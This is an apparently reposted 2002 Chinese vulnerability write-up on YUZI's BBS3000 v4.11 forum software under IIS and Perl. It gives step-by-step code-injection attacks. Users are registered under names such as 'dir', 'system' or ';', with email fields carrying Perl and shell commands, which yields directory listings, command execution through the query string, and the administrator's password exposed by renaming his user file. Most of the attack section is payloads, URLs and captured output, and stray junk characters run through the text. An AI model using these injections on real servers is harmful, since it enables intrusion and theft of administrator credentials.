窥探YUZI的BBS3000社区安全性--1

YES东

窥探YUZI的BBS3000社区安全性--1
& _( l! M4 o$ V& N4 g4 x& O+ P文章类型：漏洞分析 文章加入时间：2002年1月24日22:24
--------------------------------------------------------------------------------

0 D+ ~, J+ v( S: z  m窥探YUZI的BBS3000社区安全性
. b$ }' r7 Z) P' l7 G- z—————————————————————————————————
( X1 I5 n( P  W: X  D( }  U7 W% ~8 bbadboy-club@21cn.com
部分漏洞提供者：
" K- u5 _5 W! aadver
x.z
这并不是什么权威教材，只适合菜鸟了解某些免费提供的论坛程序存在的不
: |$ o, U/ P1 _: k  J1 ^安全面，切莫用此方法在国内做尝试，如果你偏要如此，那么由此引起的一
1 \' P2 L, w. Q  W$ W切法律后果由你自己负责。
0 X+ [' _0 P$ o/ C0 f2 @. P& ?# d本文只允许在网络任意转载，但须保留文章的完整性，如把本文作为经济目
7 f1 S, h) {, b4 b( o的使用，或者未经本人许可进行印刷、光盘杂志、等出版性质的行为，本人
3 s& ~% q, t7 }' F  ]% b; T( s" H将保留侵权控告的权利。
, ^% G1 q5 m0 M9 K—————————————————————————————————
- G! X' z5 t- K/ Z第一篇
****基本漏洞测试*****
    YUZI的BBS3000被不少的国内个人站点和企业站点用来作为网友交流的论坛，
但不少用户很少去探测这论坛的安全性，使用者很大程度上信任作者，而实际上
这些免费的版本和汉化修改论坛，往往存在一些致命的漏洞，本文的目的在于揭
# n) e0 v  s6 u示该论坛不为人知的漏洞，让大家更好的使用这类论坛，并且保证自身资料的隐
8 c$ A: k, {- A1 |% [3 J* m; U蔽和服务器的安全。
测试版本:bbs3000 v4.11
系统平台：win2k adv server=sp3 + iis 5.0  +ActivePerl 5.6.1.626
应用程序映射:perl.exe %s %s 动作：GET,HEAD,POST
/ c, V& M" S8 `8 E. V        或者:perlIS.dll 动作：GET,HEAD,POST
测试情况：
一、用户名为dir的漏洞
* I" U% d& K- r1、采用应用程序映射:perl.exe %s %s应用程序映射
在站点建立一目录（或者虚拟目录）bbs3000,按论坛作者提供的说明书，默认安
装BBS3000 v4.11版本，我们注册一用户名为dir,密码为system,信箱为
. v8 b6 ]8 v9 j# ~5 I) N$ \#badboy@badclub.org（#任意信箱都可以），然后我们在IE地址栏处输入：
# V. R! e* a8 [http://192.168.0.1/bbs3000/yhzl/dir.cgi
! j' J3 H" q& f+ z+ ]: Y3 n+ JF:\new\bbs3000\bbs3000 的目录
0 p% S% |% l8 B& Y8 t( m# D2002-01-16  19:26       <DIR>          .
2002-01-16  19:26       <DIR>          ..
9 }' B8 Z- X& z; d3 _( `% X2 X# b2002-01-16  22:42               43,247 bbs.cgi
2002-01-16  22:47               50,934 cjyh.cgi
$ H' i, f# h/ c4 S( f3 V2002-01-16  22:43               38,551 bbs1.cgi
1 [5 ?: O& f7 Q8 L: j2002-01-16  22:48                6,401 cookie.cgi
2002-01-16  22:42                2,138 affiche.cgi
% c0 C8 @" z+ P5 v. u1 M2002-01-16  22:43               22,434 bbs2.cgi
& k7 F1 r% E! K6 w. E# |（以下略）
              34 个文件        417,611 字节
              15 个目录  1,830,944,768 可用字节
% ^8 t3 K# O  v
& }7 x; x; j, Y/ X5 u2、采用应用程序映射:perlIS.dll应用程序映射
3 W2 G& g+ T4 M7 W! O得到的显示页面为：
. c( V, ~' E5 ['F:\new\bbs3000\bbs3000\yhzl\dir.cgi' script produced no output
# A* [; V5 B1 d  N0 c7 m- E测试解释：在应用程序映射中，一个扩展名只能由一个程序去映射，在采用
  P4 [, y$ {5 [# g) V( D/ ^1 zperl.exe时，BBS3000存在查看网站目录和文件的漏洞，在采用perlIS.dll时，
* `' @0 }% n3 U8 j- I6 [' [, K则有暴露网站在服务器上的绝对地址的漏洞。
% i, k- p3 w  t3 e二、用户名为system的漏洞
1、采用应用程序映射:perl.exe %s %s应用程序映射
注册一用户名为system，密码为空格键（或者密码为system），信箱为
'dir c:'#@badclub.org，然后我们在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/system.cgi
返回的页面显示为：
C:\ 的目录
/ F/ k  s* Z/ ?( p) _6 f2001-11-27  20:56                1,002 FRUNLOG.TXT
6 e  h4 e  b! T5 y* @2001-11-27  20:49       <DIR>          WINNT
（以下略）
& G5 d. ~  l0 V; A% M2 {7 s              10 个文件         29,583 字节
+ d3 k  i" {8 a; t               9 个目录    946,327,552 可用字节
  n/ J4 l$ l1 H当密码为其他时，则显示：
CGI Error
2 E1 Q% v( p3 f5 a4 D- S( N" BThe specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
syntax error at F:\new\bbs3000\bbs3000\yhzl\system.cgi line 1, near
"1 system"Execution of F:\new\bbs3000\bbs3000\yhzl\system.cgi
+ D9 o/ `& Y# o# o6 C6 Naborted due to compilation errors.
我们还可以这样测试用户名为system的情况，密码仍然为空格键
% ?. N) P, b6 n（或者密码为system）但把信箱修改为＠ARGV##badboy@badclub.org，然后我
们在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
返回的页面显示
: ^" X# `/ F- M% z) b2 \3 e7 UD:\ 的目录
2001-01-18  23:23       <DIR>          tools
8 r6 Q: s; ^' ?7 S2001-11-27  21:18       <DIR>          98tools
1 c9 `- x$ e- t+ m# C8 A2001-04-08  13:08       <DIR>          W2Kreskit
& r; W9 n9 z' W& |0 U! R2001-11-06  19:52       <DIR>          NOCDKEY-PROT
; R( m" v9 \# T* b# _/ _2001-12-01  21:32       <DIR>          WINNT
3 z+ K% q2 b* Q: A2001-12-01  21:39       <DIR>          Documents and Settings
7 Q# |, \# D7 M: h2 \2001-12-01  21:41       <DIR>          Program Files
2001-12-01  21:53       <DIR>          Inetpub
  K  m8 w2 W/ J1 j! G0 w2002-01-16  19:17       <DIR>          pl
（以下省略部分内容）   
/ F' P& _" N) S" t% k/ j7 k           12 个文件     15,068,818 字节
              15 个目录  2,371,317,760 可用字节
+ d- J$ }0 ^+ L& q'0' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
2、采用应用程序映射:perlIS.dll应用程序映射
6 h  m9 D' g, L$ [用户名为system，密码为空格键（或者密码为system），信箱为'dir c:'#@badclub.org，
* O* d/ H, s6 C! d5 j5 N- L然后我们在IE地址栏内输入：
2 _, x* m; _7 }' A3 y; a, i8 Z9 S$ x0 Whttp://192.168.0.1/bbs3000/yhzl/system.cgi
返回的页面显示为：
'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output
, J6 V) D  T3 n. y6 h4 D, Z8 i把信箱修改为＠ARGV##badboy@badclub.org，然后我们在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
2 _. R+ D1 ^) ^4 _! z  ~# F0 E7 ?返回的页面显示
7 `# M) D& O$ }7 }# F* s: w+ d'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output
三、用户名为;字符的情况
1、采用应用程序映射:perlIS.dll应用程序映射
5 N- m7 Q3 `$ T( S- m# S9 i; y注册一用户名为;字符，密码为1，信箱为rename "badboy.cgi","badboy.txt";#@badclub.org ，
$ g% B+ P3 X5 m( A! T（这里假设badboy为该论坛的社区区长，也就是该论坛最大权限的用户），然后我们
( O3 U4 ^# J: e& k. o8 s) S' q在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/;.cgi
返回的页面显示
'F:\new\bbs3000\bbs3000\yhzl\;.cgi' script produced no output
  G) c! ]0 z8 V8 x* m/ ^2 O, w嗯，怎么还是和上面的perl.dll例子一样啊？？后面的就是关键了，你再输入这样
5 K/ X5 d7 t. U) p  l' o9 {的看看
9 s8 n- C* s+ y2 f7 [. fhttp://192.168.0.1/bbs3000/yhzl/badboy.txt
返回的页面显示为
badpass badboy http://192.168.0.1 2002-01-16
' N- h0 z9 Q' |显示的内容前面就是密码、用户
4 I' L$ _5 \4 |5 U; F$ l6 P% x天啊，事情怎么那么容易呀！！~_*
  O2 P, k5 q4 z7 N+ ?经测试，用户名为system密码为一个空格键（或者为system)，信箱为
rename "badboy.cgi","badboy.txt";#@badclub.org 的时候，步骤和上面一样，同样
可以获得相同的结果。
2、采用应用程序映射:perl.exe %s %s应用程序映射
用户名为;字符，密码为1，信箱为rename "badboy.cgi","badboy.txt";#@badclub.org
7 O# ]; R6 q$ ^% ~4 S( A6 A在IE地址栏内输入：
, j8 ~! a0 h5 n! T. ehttp://192.168.0.1/bbs3000/yhzl/;.cgi
返回的页面显示
& X* p' }0 K) j" k9 uCGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
, N( r$ _3 [* b& Cheaders. The headers it did return are:
4 Y; ^( x6 h! \, \; w